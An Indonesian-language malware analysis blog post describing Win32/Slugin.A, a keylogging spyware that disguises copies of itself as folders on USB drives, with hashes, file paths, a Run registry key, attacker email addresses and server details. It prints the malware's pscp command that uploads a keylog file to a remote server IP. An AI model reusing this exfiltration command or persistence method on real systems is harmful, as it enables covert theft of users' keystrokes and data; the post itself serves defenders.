Slugin, Variant dari FakeFolder

Posted in Spyware, Trojan, virus on Nov 20, 2016

slugin1

Win32/Slugin.A dengan Wplugin.dll-nya, sebuah ‘spyware‘, mungkin ‘trojan‘, yang cukup misterius, yang mungkin [lagi] kita kira hanya sebagai virus biasa dengan kemampuan ‘Kage Bunshin no Jutsu‘-nya Naruto, menggandakan diri dengan menyerupai folder.
Servernya sampai saat ini masih aktif, dan kemungkinan dia menggunakan perintah (command) dari Putty untuk melakukan transaksi data ke Paris, Perancis, yang diduga sebagai sarang (server) dimana virus berasal.

Dilihat dari sifat dan ulah dari virus Slugin ini, maka kami simpulkan bahwa virus ini masih keluarga dengan virus FakeFolder seperti pada postingan sebelumnya.

Karakteristik Virus

Nama induk virus: msn.exe

Dibuat menggunakan: (tidak diketahui, diduga menggunakan MinGW)

Ukuran: 416 KB (426.979 bytes)

SHA256: 9EDFBE4BBFDF1B2FB3E8C7C57DBEEE05F43A66CDF7B8352808BCE53F3023C247

 

Nama plguin yang diekstrak virus: Wplugin.dll

Dibuat menggunakan: Microsoft Visual C/C++(6.0)

Ukuran: 108 KB (110.592 bytes)

SHA256: 9C2726DEFA122089F8251FA104F76D66830F448774AB9BD634ADBB6E492E3943

 

Aksi Virus

Saat virus aktif di komputer korban, pertama-tama virus meletakkan induknya di:

  • C:\ProgramData\win\msn.exe

Dan di:

  • C:\win\msn.exe
    • Dengan command:
      • pscp|C:\Users\%NAMAUSER%~1\AppData\Local\Temp\\iosystem.dll|87.98.185.184:/ecoute/spool/%NAMAUSER%-%NAMAUSER%-4ED560BB-1479600820

Virus ini juga mencopykan diri ke setiap ditemukannya folder pada Flashdisk:

  • G:\honey_parent\sub 1.exe
  • G:\honey_parent\sub 2.exe
  • … dst

Sedangkan, untuk folder yang ada, folder yang asli, dia sembunyikan dengan atribut hidden.

Registry

Virus menambahkan nilai pada Registry agar bisa aktif saat komputer dinyalakan:

  • Windows Registry Editor Version 5.00
    [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run]
    “apo5″=”C:\\ProgramData\\win\\msn.exe”

Pasukan Virus

Virus ini tak sendirian, virus ini mengekstrak file didalam dirinya dan diletakkan pada direktori / folder:

  • C:\Users\%NAMAUSER%\AppData\Roaming\Wplugin.dll

Tujuan menyisipkan file “Wplugin.dll” bagi virus Slugin ini adalah sebagai library (perpustakaan) fungsi yang sewaktu-waktu bisa digunakan virus untuk mengirim data hasil kegiatan mata-mata (keylogging) ke server virus.

Adapun data rekaman data hasil mata-matanya disimpan dalam file “.dll” yang padahal file plaintext:

  • C:\Users\%NAMAUSER%\AppData\Local\Temp\iosystem.dll

Bukan hanya data hasil keylogging, ada data khusus yang diprogram oleh pembuat virus ini agar dia (pembuat virus) mendapatkan data yang dia inginkan:

  • WND;;Smadav_Lab_BeKaBe-SMADAV_LAB_BKB-4ED560BB
  • T5.255;c||NTFS|d|RYAN BEKABE|FAT32|e||NTFS;Smadav_Lab_BeKaBe-SMADAV_LAB_BKB-4ED560BB
  • WND;SmartS;Smadav_Lab_BeKaBe-SMADAV_LAB_BKB-4ED560BB
  • INFO;6;1;7601;1;0;256;1;0;4;XXXXX;Smadav_Lab_BeKaBe-SMADAV_LAB_BKB-4ED560BB
  • KEY;XXXXX-DHTBF-Q6MMK-KYK6X-XXXXX;Smadav_Lab_BeKaBe-SMADAV_LAB_BKB-4ED560BB

Maka, dengan “Wplugin.dll” tersebut, data dari komputer korban bisa sampai ke tangan si pembuat virus, yang bisa saja dikirim melalui EMail ke:

  1. EMail: cvmb@hotmail.com
  2. sv003@yahoo.com

Atau melalui script upload dari server ASP si pembuat virus:

  1. UploadFile1.asp
  2. UploadFile2.asp
  3. KillServer.asp
  4. ChangeService.asp

Server Virus

Host Server: 87.98.185.184
Remote Port: 8829
Port: 22 (SSH, TCP)

Virus ini diduga berasal dari Paris, Perancis, atau hanya server-nya saja yang berada di Paris, bukan si Programmernya.

Adapun data dari perintah SSH yang dilakukan virus:

SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8
SSH-2.0-.
SSH-2.0-OpenSSH_6.6.1p1 Ubuntu-2ubuntu2.8

~diffie-hellman -group1-sha1,dif fie-hellman-grou p14-sha1,diffie- hellman-group-ex change-sha256,di ffie-hellman-gro up-exchange-sha1 ….ssh-rsa,ssh- dss….arcfour25 6,arcfour128…. arcfour256,arcfo ur128….hmac-sh a1,hmac-sha1-96, hmac-md5….hmac -sha1,hmac-sha1- 96,hmac-md5….n one,zlib….none ,zlib
Acurve25519-sha 256@libssh.org,d iffie-hellman-gr oup-exchange-sha 256….ssh-rsa,s sh-ed25519…lch acha20-poly1305@ openssh.com,aes2 56-gcm@openssh.c om,aes128-gcm@op enssh.com,aes256 -ctr,aes192-ctr, aes128-ctr…lch acha20-poly1305@ openssh.com,aes2 56-gcm@openssh.c om,aes128-gcm@op enssh.com,aes256 -ctr,aes192-ctr, aes128-ctr….hm ac-sha2-512-etm@ openssh.com,hmac -sha2-256-etm@op enssh.com,hmac-r ipemd160-etm@ope nssh.com,umac-12 8-etm@openssh.co m,hmac-sha2-512, hmac-sha2-256,hm ac-ripemd160,uma c-128@openssh.co m….hmac-sha2-5 12-etm@openssh.c om,hmac-sha2-256 -etm@openssh.com ,hmac-ripemd160- etm@openssh.com, umac-128-etm@ope nssh.com,hmac-sh a2-512,hmac-sha2 -256,hmac-ripemd 160,umac-128@ope nssh.com….none ,zlib@openssh.co m….none,zlib@o penssh.com

 

Cara Membersihkan Slugin

Jika Smadav belum mendeteksi virus ini, user tetap bisa menambahkan file atau proses virus ini sebagai virus (bagi Smadav) yakni dengan menggunakan fitur yang disediakan Smadav, seperti pada artikel kami sebelumnya.

 

8 Responses to “Slugin, Variant dari FakeFolder”


  1. Adugna says:

    Smadav is perfect.

     


Leave a Reply


  • Search

    Loading
  • Wall

    Previous Next
    Latest on Mon, 12:16 am

    Mimose Desir: Je suis contente d'avoir cette nouvelle version

    Burlington coupons: Great product! Fast shipping! Thanks. Burlington coupons http://www.burlingtoncoatcoupons.com

    titus: good one

    titus: good

    ochitiga muzamil: perfect one

    djkaybee: good one

    okochi emmanuel: perfect service

    Asmawi: Ingin yang terbaik

    carolyn: very good

    mubarak rabiu: good experiance

    » Tuliskan komentar Anda :